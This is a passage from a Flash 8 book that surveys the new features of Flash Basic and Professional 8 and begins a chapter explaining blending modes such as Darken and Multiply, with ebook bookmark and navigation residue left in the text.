[bookmark: 33][bookmark: ch01lev2sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Bitmap Caching
Just as web pages are cached in your web browser
to assist with the speedy retrieval of page data, runtime bitmap
caching allows you to specify movie clips or buttons that can be cached
within Flash Player (at runtime) to speed up screen redraw. By
declaring that these symbols be cached as bitmaps, the Flash Player
doesn't have to redraw them [bookmark: 34][bookmark: N40336E565C1E-70B7-44D0-82B7-BC4CDC351AB9]constantly from vector data. This provides a significant speed and performance enhancement. Chapter 7 outlines the details of Flash 8's speed improvements.
For example, let's say you've created an animation
that uses a complex physics algorithm to sequentially draw a series of
cubes on the screen. Rather than having to execute the algorithm on a
static cube that has already been rendered to the stage, you can use
runtime bitmap caching to effectively freeze these prerendered cubes.
This ability to freeze a static portion of a symbol that isn't being
updated reduces the number of times Flash Player has to perform a
redraw operation. If a region changes onstage, vector data is used to
update the bitmap cache accordingly.
[bookmark: 35][bookmark: ch01lev2sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Bitmap Smoothing
In previous versions of Flash, there was often a
marked difference in the quality of bitmap images when viewed in the
authoring environment than when viewed in Flash Player. The new bitmap
smoothing feature addresses this issue by allowing designers to apply
anti-aliasing to imported images so that they render comparably in both
environments. Figures 1-1 and 1-2 demonstrate the bitmap smoothing feature.
[bookmark: 36][bookmark: ch01fig016E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-1: A bitmap image with smoothing not enabled
[bookmark: 37][bookmark: ch01fig026E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-2: A bitmap image with smoothing enabled
[bookmark: 38][bookmark: N40926E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 39][bookmark: ch01lev2sec36E565C1E-70B7-44D0-82B7-BC4CDC351AB9]New Curve Algorithm
The new curve algorithm feature allows designers
to modify the amount of smoothing applied to curves drawn with the
Brush and Pencil tools. Using the new Optimize Curves dialog box (see Figure 1-3),
you can increase (or decrease) the number of points used to calculate a
curve. The downside of this new feature is that using more points
results in larger SWF files. You can choose to apply this feature to a
shape you've drawn by selecting Modify ➤ Shape ➤ Optimize.
[bookmark: 40][bookmark: ch01fig036E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-3: The new Optimize Curves feature
[bookmark: 41][bookmark: ch01lev2sec46E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Gradient Enhancements
The gradient enhancements within Flash 8 allow
you to add up to 16 colors to a gradient, as well as use a bitmap as a
gradient fill.
A gradient focal point feature has also been added to
Flash 8 to give designers greater control over the direction and focal
point of their gradients. Using the Fill Transform tool, you simply
drag the focal point of the gradient from the outside of the object
you're filling to manipulate how the gradient is rendered within your
object.
Flash 8 also allows you to lock a bitmap or gradient
fill to give the impression that the fill extends over the entire
stage. New objects that are painted with the locked gradient fill
appear as masks that reveal the underlying gradient or bitmap. (See Figure 1-4.)
[bookmark: 42][bookmark: ch01fig046E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-4: Enhanced gradients, including the new gradient focal point
[bookmark: 43][bookmark: N41696E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 44][bookmark: ch01lev2sec56E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Object Drawing Model
In previous versions of Flash, when you used the
Brush, Line, Oval, Pencil, or Rectangle tool to draw an intersecting
line (or shape) across another line (or shape), the overlapping objects
would be divided into segments at the point of intersection. Then,
using the Selection tool, you could select, move, or manipulate each
segment individually. This mode of illustration subtraction is known as
the Merge Drawing model (see Figure 1-5).
[bookmark: 45][bookmark: ch01fig056E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-5: The traditional Merge Drawing model
Flash 8 introduces the Object Drawing model, which
allows designers to create shapes and lines directly on the stage as
separate objects. So, unlike the Merge Drawing model, these new shapes
and lines don't interfere with other pre-existing shapes on the stage
(see Figure 1-6).
This allows you to safely overlay objects that are on the same layer
without fear of merging or dissecting parts of other objects on the
stage. Activating Object Drawing is as simple as clicking the Object Drawing button found among the options for each tool in the Tools panel.
[bookmark: 46][bookmark: ch01fig066E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-6: The new Object Drawing model, in which shapes maintain their forms when overlaid
Flash 8's drawing enhancements are covered in more detail in Chapter 4 of this book.
[bookmark: 47][bookmark: N42416E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 48][bookmark: ch01lev2sec66E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Oval and Rectangle Tool Settings
To assist designers with common illustration
tasks such as specifying the dimensions of frequently drawn objects,
Macromedia has introduced a new dialog box, Rectangle Settings (see Figure 1-7), that allows designers to specify the width and height of ovals and rectangles, as well as the corner radius of rectangles.
[bookmark: 49][bookmark: ch01fig076E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-7: The new Oval and Rectangle tool settings
[bookmark: 50][bookmark: ch01lev2sec76E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Return of Normal Mode Scripting
When Macromedia removed Normal Mode scripting
from Flash MX 2004, there was an outcry from the design community. Many
designers who weren't familiar with ActionScript syntax relied heavily
on Normal Mode scripting to add interactivity to their Flash content.
Thankfully, Macromedia believes in listening to its
users, and it has returned Normal Mode scripting to Flash 8, but this
time under the moniker of Script Assist.
Essentially, Script Assist is identical to Normal Mode
scripting, but with a few enhancements. Script Assist allows you to
search and replace text, view script line numbers, and save a script in
the Script pane when you click away from the object or frame (this is
known as pinning). You can also use the Jump menu to go to any script on any object in the current frame. You can select and deselect Script Assist by clicking the Script Assist button on the Actions panel (see Figure 1-8).
[bookmark: 51][bookmark: ch01fig086E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-8: Normal Mode scripting returns under the moniker of Script Assist.
[bookmark: 52][bookmark: N43186E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 53][bookmark: ch01lev2sec86E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Improved Strokes
Flash 8 has improved the way in which designers
can work with paths and strokes. No longer are you subjected to dealing
with only one type of path end (cap); you now have the option of using
either rounded or square caps.
Joins (i.e., the points at which two paths meet) have
also received a makeover, with designers now having the choice of using
either Bevel, Miter, or Round joins (see Figure 1-9). These are chosen from the Join drop-down menu, found sitting proudly on the Property Inspector.
[bookmark: 54][bookmark: ch01fig096E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-9: New stroke joins
Strokes can now be colored using a gradient, and their maximum size has been increased from 10 to 200 pixels.
[bookmark: 55][bookmark: N43556E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 56][bookmark: ch01lev2sec96E565C1E-70B7-44D0-82B7-BC4CDC351AB9]TextField Improvements
Macromedia has made some significant improvements
to the way Flash renders text (both in the authoring environment and
within Flash Player).
New Saffron text-rendering technology has been licensed
from Mitsubishi Electric Research Labs and integrated into Flash Player
8. Saffron greatly improves the quality of the rendering of small font
sizes.
Historically, text that was rendered within the Flash
authoring environment has varied considerably from that rendered within
Flash Player. Flash 8's new WYSIWYG text anti-aliasing feature ensures
that what you see in the authoring environment is what you get in Flash
Player.
In addition to this, Flash 8 now facilitates the
anti-aliasing of text based on the specific end-viewing environment.
For example, a line of animated text would have different anti-aliasing
requirements than a large block of static text with a small font size.
If you use the Anti-alias for animation text option, the alignment and kerning information is ignored and the text is rendered as smoothly as possible.
TextField improvements are covered in much more detail in Chapter 6 of this book.
[bookmark: 57][bookmark: ch01lev2sec106E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Security Enhancements
Security of Flash Player and the SWF format has
always been paramount for Macromedia. This view has been further
consolidated in Flash 8 with the release of a new Local or Network
Security model. The new model helps prevent SWF files from being used
maliciously to access local file information and transmit that
information over a network.
[bookmark: 58][bookmark: N44016E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Contained within the Publish Settings dialog box (accessed via File ➤ Publish Settings),
developers now have the option of specifying either a local or a
network security model for their SWF files. Files that have been
granted network access permission won't be able to access local file
data, and vice versa.
[bookmark: 59][bookmark: ch01lev2sec116E565C1E-70B7-44D0-82B7-BC4CDC351AB9]SWF File Metadata
One of the major bugbears developers have had
since Flash's inception was the product's inability to produce to SWFs
that could be indexed by search engines such as Google. This was due to
their inability to included embedded metadata within the SWF.
Flash 8 has addressed this issue by adding the
capability to import metadata into SWFs in XML format. This metadata is
based on the RDF (Resource Description Framework; see) and XMP (Extensible Metadata Platform; see) specifications, and is stored within Flash in a W3C-compliant format.
[bookmark: 60][bookmark: ch01lev2sec126E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Video Improvements
The encoding and workflow of video within Flash 8
has been substantially enhanced via the introduction of On2's VP6 video
codec. This new codec is part of the core Flash Player upgrade, and it
substantially improves video playback, quality, and encoding. Unlike
Flash Professional, Flash Basic allows only the encoding of embedded
video via the Import Video option. Additionally, encoding to VP6 within Flash Basic is restricted to three presets, none of which can be modified.
Flash 8 video improvements are covered in greater detail in Chapter 5 of this book.
[bookmark: 61][bookmark: ch01lev2sec136E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Workspace Enhancements
This section covers all the workspace
enhancements present in Flash 8, added in response to the reams and
reams of valuable feedback given to Macromedia by all you Flash
developers and designers out there. Talk about a community effort!
[bookmark: 62][bookmark: ch01lev3sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Exporting Keyboard Shortcuts as HTML
Flash keyboard shortcuts can now be exported as
HTML files that can be viewed and printed using a standard web browser.
This is done by opening the Keyboard Shortcuts dialog box (Edit ➤ Keyboard Shortcut on the PC, or Flash 8 Professional/Basic ➤ Keyboard Shortcuts on the Mac) and then selecting the Export As HTML button at the top-right corner.
[bookmark: 63][bookmark: N45086E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 64][bookmark: ch01lev3sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Library Enhancements
The following list describes the enhancements to the Flash Library:
Single library panel: In previous versions of Flash, separate
library panels were required to view the library items of multiple
Flash files. Library panel enhancements in Flash 8 now allow users to
view the library items of multiple Flash files simultaneously in the
same single panel (see Figure 1-10).
Library panel state memory: This was allegedly one of the most
requested enhancements for this version of Flash, but strictly
speaking, this is more a bug-fix than an enhancement. In previous
versions of Flash, when you opened (or closed) library panels in a
document you were working on, and then closed that document, you would
expect the library panels to be in the same place/order/sequence when
you reopened the document again. Alas, this was not the case. This
"undocumented feature" has been addressed, and library panels now
remember the state they were left in.
Drag-and-drop library components: When working with components
in previous versions of Flash, in order to add components to the
library of a Flash file, you first had to place them onto the stage and
then delete them. Flash 8 has addressed this issue, and you can now
place components directly into the library without first having to
place them onto the stage.
[bookmark: 65][bookmark: ch01fig106E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-10: Multiple document libraries in a single panel
[bookmark: 66][bookmark: ch01lev3sec36E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Macintosh Document Tabs
Mac users can now open and easily navigate
through multiple Flash documents within the same window. This is
accomplished via the new Macintosh Document Tabs feature, located at
the top of the workspace (see Figure 1-11).
[bookmark: 67][bookmark: ch01fig116E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-11: The new Document Tabs feature
[bookmark: 68][bookmark: N45976E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 69][bookmark: ch01lev3sec46E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Object-based Undo and Redo Commands
Flash 8 users now have the option of tracking
changes from either a document or an object level. Using the
object-based Undo/Redo command lets users undo the changes made to an
object without having to undo changes to other objects (as is the case
with the document-level Undo/Redo option).
[bookmark: 70][bookmark: ch01lev3sec56E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Expanded Stage Pasteboard
The pasteboard is the gray region located around
the outside boundary of the stage. Historically, designers have used
this area to place graphics or components they want to include within a
Flash movie, but don't necessarily want to appear onstage during
playback (or want them to appear at a later point in an animation).
Flash 8 has increased the size of the pasteboard, giving designers more
screen real estate to work with.
[bookmark: 71][bookmark: ch01lev2sec146E565C1E-70B7-44D0-82B7-BC4CDC351AB9]XML-to-UI Extensibility
Historically, customizing user interfaces (UIs)
so they work across the various operating platforms, such as Windows
and Macintosh, has been a developer's nightmare. To help ease some of
this pain, Netscape and Mozilla teamed up to develop XUL (pronounced
"zool")—XML User Interface Language.
Using a subset of XUL and some custom Flash tags,
XML-to-UI extensibility allows developers to extend and automate the
Flash 8 IDE to perform common and repetitive tasks/actions. These
include behaviors, commands (JavaScript API), effects, and tools.
The XML-to-UI engine works with each of these
extensibility features to create custom modal dialog boxes if the
extension either requires or accepts parameters. These modal dialog boxes are required to be dismissed (either accepted or cancelled) by the user before the application can continue.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch016E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 72][bookmark: ch01lev1sec36E565C1E-70B7-44D0-82B7-BC4CDC351AB9]New Flash Professional 8–Specific Features
Flash Professional 8 contains the same feature
set as Flash Basic 8, plus an abundance of new features that are
specific only to the Professional edition.
[bookmark: 73][bookmark: ch01lev2sec156E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Blend Modes
Blend modes allow designers to apply compositing effects to objects located on the stage (see Figure 1-12). Compositing
refers to the process of varying (or blending) the color (or
transparency) of an object on one layer with an object located on a
layer below it.
[bookmark: 74][bookmark: ch01fig126E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-12: The new object blend modes
Designers who are familiar with other graphics
applications such as Photoshop will instantly recognize some of the 14
new blend modes available in Flash Professional 8, which include Multiply, Difference, Saturation, and Hue.
Blend modes are discussed in more detail in Chapter 2 of this book.
[bookmark: 75][bookmark: N47146E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 76][bookmark: ch01lev2sec166E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Custom Easing Controls
Offering a two-dimensional graph to represent the
start and end points of a tweened animation, Flash Professional 8's new
custom easing controls give designers the ability to precisely
manipulate the speed and complexity of the rate at which their
animations ease in or out. This helps create more realistic movement
within animations.
The best way to get to grips with this new feature is
to experiment! Try creating a simple tween animation such as a bouncing
ball, and compare the old familiar easing controls with the new custom
easing controls. You can access the new controls by clicking the new Edit button found next to the familiar controls, which opens up the screen shown in Figure 1-13. You'll be impressed.
[bookmark: 77][bookmark: ch01fig136E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-13: The new Custom Ease In/Ease Out controls
[bookmark: 78][bookmark: ch01lev2sec176E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Graphics Effects Filters
One of the most heralded new features of Flash
Professional 8 allows designers to apply graphics effects filters—such
as the Drop Shadow, Blur, Glow, Bevel, Gradient Bevel, and Adjust Color
filters—to objects located on the stage.
The filter process is performed by passing the object's
image data through a series of algorithms that filter (and subsequently
render) the data in a predefined way.
Filters can be applied to MovieClips, TextFields, and
button symbols, and are rendered in real time by Flash Player. Filter
effects can be applied either via the Filters tab located in the Properties panel or programmatically via ActionScript.
Filters are covered in more detail in Chapter 3 of this book.
[bookmark: 79][bookmark: N47926E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 80][bookmark: ch01lev2sec186E565C1E-70B7-44D0-82B7-BC4CDC351AB9]More TextField Enhancements
Along with the new WYSIWYG Anti-alias for readability and Anti-alias for animation options contained within Flash Basic 8, Flash Professional 8 has a Custom anti-alias feature that allows you to customize the sharpness and thickness of your text (see Figure 1-14).
[bookmark: 81][bookmark: ch01fig146E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-14: The new WYSIWYG text anti-aliasing feature
The Sharpness option determines the degree of smoothness between the text edges and the background, while the Thickness option allows you to tweak the degree of text edge blend with the background.
The anti-aliasing options are also covered in more detail in Chapter 6 of this book.
[bookmark: 82][bookmark: N48606E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 83][bookmark: ch01lev2sec196E565C1E-70B7-44D0-82B7-BC4CDC351AB9]More Video Improvements
One of the major improvements in Flash 8 is the
turbo-charging of its video tool set. This includes the addition of a
new video codec within Flash Player for greatly optimized playback, and
an improved video encoder for streamlined workflow. The inclusion of
video alpha channel support raises the bar even further, giving
rich-media designers a new level of creative freedom.
These new video features are covered in greater detail in Chapter 5 of this book.
[bookmark: 84][bookmark: ch01lev3sec66E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Improved Video Workflow
Flash Professional 8's Video Import Wizard has
been improved to assist designers in importing (and exporting) video in
a variety of formats (such as embedded, progressively downloaded,
streamed, or linked).
The Video Import Wizard also contains an enhanced
library of predesigned video player skins that can be used as playback
shells for your imported videos when they're exported. These skins are
exported as separate SWFs and can be customized to suit your individual
requirements as a designer (see Figure 1-15).
[bookmark: 85][bookmark: ch01fig156E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-15: Custom skins for FLV controls
[bookmark: 86][bookmark: N49166E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 87][bookmark: ch01lev3sec76E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Alpha Channel Support
One of the most eagerly awaited features of Flash
Professional 8 is its new video alpha channel support. Using On2's V6
video codec, Flash Player 8 now offers support for runtime alpha
channels. This new feature allows designers to import video that has
been captured in front of a blue (or green) screen. Using the new alpha
channel support, this video can then be overlaid on still images or
live video, allowing for multilayered compositing.
For example, imagine you've captured some video footage of a woman, filmed in front of a blue (or green) background (see Figure 1-16).
You then import this video into Flash Professional 8 and overlay it on
a static (or animated) image of a shopping mall. Using the alpha
channel support, you specify the background green color of the first
video as an alpha channel. This effectively renders the green
background (of the woman video) into a transparent background, which in
turn reveals the static image of the shopping mall on the layer below.
Voilá—you've just instantly created a special effect of a woman
hovering through a shopping mall (see Figure 1-17)!
[bookmark: 88][bookmark: ch01fig166E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-16: A video filmed with a green screen alpha channel
[bookmark: 89][bookmark: ch01fig176E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-17: The same video, with a shopping mall animation composited into the alpha channel
[bookmark: 90][bookmark: ch01lev3sec86E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Embedded Cue Points
Tucked away within the advanced tabs of the new
Video Import Wizard is a feature for adding embedded cue points to your
Flash video (FLV). Cue points are markers that are inserted into your video and can be used to dynamically trigger events during playback.
Cue points come in two flavors: navigation and event.
Navigation cue points can be used for something as simple as a scene
selection menu, whereas event cue points can be used for something more
complex, such as triggering an event to display a separate animation or
on-screen textual definition of an item being discussed within a movie.
See Figure 1-18.
[bookmark: 91][bookmark: ch01fig186E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-18: The new embedded cue points for video
[bookmark: 92][bookmark: N50206E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 93][bookmark: ch01lev3sec96E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Stand-alone FLV Encoder
The Flash Professional 8 ships with an external
FLV video encoder. This stand-alone encoder, which can be installed on
a separate, dedicated PC, provides video professionals who prefer to
work outside the Flash authoring environment with the facility to
encode FLV files.
The stand-alone encoder contains the same features
as the authoring environment encoder, but with the added advantage of
including batch-processing capabilities that allow developers to encode
multiple video files at once.
[bookmark: 94][bookmark: ch01lev3sec106E565C1E-70B7-44D0-82B7-BC4CDC351AB9]FLV QuickTime Export Plug-in
Now more than ever, leading third-party video
applications are supporting the FLV format. This is further highlighted
by the release of the FLV QuickTime Export plug-in, which, when used in
conjunction with video applications from companies such as Avid, Adobe,
and Apple, provides FLV export capabilities from within their software.
[bookmark: 95][bookmark: N50426E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 96][bookmark: ch01lev3sec116E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Advanced Settings for On2 V6 Video Encoding
To provide designers with increased control over
their video encoding, Flash Professional 8 has a new feature that
allows the manipulation of advanced settings of On2 V6 video encoding.
Located within the Video Import Wizard, the Advanced Settings
encoding option allows you to modify video encoding elements such as
frame and data rates, keyframe placement, video and audio quality, and
file dimensions.
[bookmark: 97][bookmark: ch01lev2sec206E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Flash Mobile Enhancements
Flash Professional 8 contains a new mobile device
emulator to allow developers to test and view their Flash Lite
applications (see Figure 1-19).
Content created for output via either Flash Lite 1.0 or 1.1 can now be
viewed and tested via a series of new device templates that display and
interact with content as they would on the selected phone.
[bookmark: 98][bookmark: ch01fig196E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 1-19: Flash Lite mobile emulator
The Flash Lite emulator also generates error and warning messages to help debug your: 99][bookmark: ch01lev1sec46E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Summary
[bookmark: 100][bookmark: IDX-186E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Despite the fact that Flash 8 may be the last
version of Flash to ship under the Macromedia corporate moniker,
Macromedia has endeavored to deliver the most (design) feature-rich
version of Flash to date. The core of this latest release is (as is the
case with most Macromedia products) built around the features and
functionality requested by the designers and developers who use the
products regularly, and it therefore makes sense that the following
chapters are written by some of the world's best Flashers!
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch026E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
Chapter 2: Blending Modes
[bookmark: 102][bookmark: IDX-196E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
by Glen Rhodes and craig swann
[bookmark: 103][bookmark: N51296E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 104][bookmark: ch02lev1sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Overview
Since the introduction of Flash as a tool for
interactive development, it has widely been used as a creative tool.
From online design, art, and animation, Flash has been adopted by both
designers and creative people worldwide, in order to bring their
visions to the world via the Internet. However, in the last few
iterations of this incredible software package there was a significant
movement into the world of application design and Rich Internet Application (RIA)
development. As Flash grew, it became integrated and geared more
towards the developer than the artist, but this is changing
dramatically in Macromedia Flash Basic 8 and Macromedia Flash
Professional 8!
It is clear, as will be demonstrated throughout
this book, that the focus of this version is to return to the roots of
visual design, for both designers and developers alike. You'll find
many incredible advancements in visual display when you explore
Macromedia Flash 8, including Filters, Drawing Improvements, Video, and
the new Image API. But first we'll take a look at blending modes. It's
time, once again, to get visual with Flash!
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: ch026E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 105][bookmark: ch02lev1sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]So, What, Exactly, are Blending Modes?
Blending modes are used to take pixel color
values from two separate movie clips or buttons and then perform a set
of calculations to create a new hybrid image. This hybrid image is a
result of the calculations made on the two overlapping objects.
If you are familiar with graphic editing programs like
Fireworks or Photoshop, then there is a good chance you have
encountered and used blending modes before in your graphic work. Figure 2-1 is an example of the blending modes available in these applications.
[bookmark: 106][bookmark: ch02fig016E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-1: Layer palettes in Photoshop and Fireworks
[bookmark: 107][bookmark: N51906E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
In these applications, blending modes are used between
two images which are found on adjacent layers. Flash, however, has a
completely different approach to stacking images, Sprites, movie clips,
and objects in the authoring environment. Of course, you have the power
to control your structure any way you like and you can easily drop a
single instance of an image or object on its own independent layer.
However, Flash also allows you the opportunity to place multiple
objects on a single layer as well as the ability to attach and
duplicate movie clips dynamically with code (which relies on levels and
not layers). This is an important concept to understand, because with
Flash, blending modes are operated on the movie clip, sprite, or button
found immediately below the movie clip, button, or sprite to which the
blending mode is applied.
It is important to understand that blending modes
can only be applied to movie clips or buttons. Of course, you can use
static or dynamic text, video files, or live camera images, but you
need to ensure that these types of content are embedded into a movie
clip which you can then use to apply blending modes. Also, only the top
or source of the blending needs to be a movie clip. When this movie
clip is blended it will impact whatever is below it, whether it is a
movie clip, text, or symbol on the stage.
[bookmark: 108][bookmark: ch02lev2sec16E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Blending Modes Supported by Flash 8
Due to the complexity of some blending modes used
in other popular imaging applications, such as "Hue" and "Luminosity"
(which requires a color space change and thus extra processing power
which does not allow for the real-time display in the Flash
environment), Flash 8 uses a subset of the most common and popular
blending modes.
Before getting into the nuts and bolts of each of the
available blending modes and the visuals that can be produced with
them, let's quickly get an overview of the sort of blends that we can
access and utilize with Flash 8.
Flash 8-supported blending modes include:
Normal
Darken
Multiply
Lighten
Screen
Overlay
Hard Light
Add
Subtract
Difference
Invert
Layer*
Alpha*
Erase*
* These last three are special blending modes that
you may not be familiar with and that require a different set of
circumstances to use. These will be covered independently later in the
chapter.
[bookmark: 109][bookmark: N52866E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
The other great thing about the addition of
blending modes in Flash 8 is the ability to access and control them
using both the Flash 8 IDE and the ActionScript API. This allows you to
utilize interesting visual effects, either through direct manipulation
on the stage via the Property Inspector or through ActionScript by
modifying a movie clip's blendmode
property. We'll take a look at the ActionScript method in a little bit.
For now, let's focus on applying blends with the Flash IDE, so that we
can see exactly what these blends look like.
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[image: ] [image: ] [image: ] [image: ]
[image: ] [image: ]
[image: ]
[image: ]
[image: ]
[image: Previous Section]
[image: Next Section]
[image: ]
[bookmark: CH02]
[bookmark: 110][bookmark: CH02LEV1SEC3]Applying Blends Using the Flash 8 IDE
In Flash 8, the Property Inspector has been
overhauled, allowing for a whole range of new visual options and
parameters, and including Blends and Filters (which we will cover in
the following chapter). You can now directly apply blends to movie
clips with the newly added Blend drop-down menu, accessible in the Property Inspector and shown in Figure 2-2.
[bookmark: 111][bookmark: CH02FIG026E565C1E-70B7-44D0-82B7-BC4CDC351AB9][bookmark: IMG_22][image: Image from book]
Figure 2-2: Blending modes can now be applied directly to a movie clip using the Property Inspector.
To help you understand the impact that blending modes
have on images, we'll go through each of the possible modes and
describe how the blending mode works, as well as demonstrate each with
an example. If you are going through this book with your computer
nearby, you can open the BlendingModes.fla
and work through these examples in realtime. If, however, you are
enjoying a sunny day and sitting in a park learning about the wonders
of Flash 8—sigh—lucky you. You can easily follow along without a
computer and see what these new blends hold in store for you.
If you are super anxious to see blending modes in
action, you can skip down to the Applying blends using ActionScript
section. You can also download the file BlendingModesAS.fla from, which allows you to dynamically swap blending modes to quickly see the new power in visual expression using blending.
[bookmark: 112][bookmark: N53566E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
But let's start at the beginning. Opening the BlendingModes.fla
file will reveal a simple Timeline architecture with two layers. Two
image movie clips have already been created and placed on their own
layers, so you can immediately start playing with blending. You'll
notice that the top layer and subsequent movie clip are labeled sourceMC, and the bottom layer and movie clip are correspondingly labeled destinationMC. Since blending modes are applied in a top-down fashion, it is the pixel information of the sourceMC that will be applied to the destinationMC. For those free from the chains of a computer, you can see the sourceMC and destinationMC being used in the examples shown in Figure 2-3.
[bookmark: 113][bookmark: ch02fig036E565C1E-70B7-44D0-82B7-BC4CDC351AB9][image: Image from book]
Figure 2-3: The sourceMC and destinationMC images used for the following blending examples
[bookmark: 114][bookmark: ch02lev2sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Normal Mode
When accessing the Blend drop-down menu (see Figure 2-2) in the General
tab of the Property Inspector the default mode will always be Normal.
This mode does not mix or combine pixels of the source image with the
destination image in any way. Thus, in normal blending mode, if you
test the BlendingModes.fla file, you will generate the image shown in Figure 2-4.
[bookmark: 115][bookmark: CH02FIG04][bookmark: img_24][image: Image from book]
Figure 2-4: BlendingModes.fla output with sourceMC set to Normal. No pixels are combined.
[bookmark: 116][bookmark: n54536E565C1E-70B7-44D0-82B7-BC4CDC351AB9]
[bookmark: 117][bookmark: ch02lev2sec36E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Darken Mode
This mode is used to punch through the darker
colors in the source image onto the destination image. When performing
the Darken blending mode, pixel colors from both sourceMC and destinationMC are compared and only the values in the sourceMC that are darker than the pixel in the destinationMC are used in the updated image.
If you change the blending mode of sourceMC in the Property Inspector to Darken you will create the new, combined image shown in Figure 2-5.
[bookmark: 118][bookmark: ch02fig05][image: Image from book]
Figure 2-5: Affected image when Darken blending mode is applied from sourceMC to destinationMC
You can clearly see that the chocolate egg in the sourceMC is now visible (as is the other chocolate goodness) over the church in the destinationMC.
This mode can generate an interesting result when the source image is
black and white or contains high contrast. By now, even if you are not
familiar with blending operations, you should start to see the new
creative possibilities that exist in leveraging assets in Flash to
create wonderful new compositions.
[bookmark: 119][bookmark: CH02LEV2SEC46E565C1E-70B7-44D0-82B7-BC4CDC351AB9]Multiply Mode
Similar to the Darken mode, Multiply mode does just what you might expect it to do. It multiplies the pixels in both the sourceMC and destinationMC.
Unlike Darken, which substitutes and displays the darker of the two
overlapping pixels, the Multiply mode multiplies the two color values.
The resulting color will always be as dark as either of the two colors
from both sourceMC and destinationMC (shown in Figure 2-6).
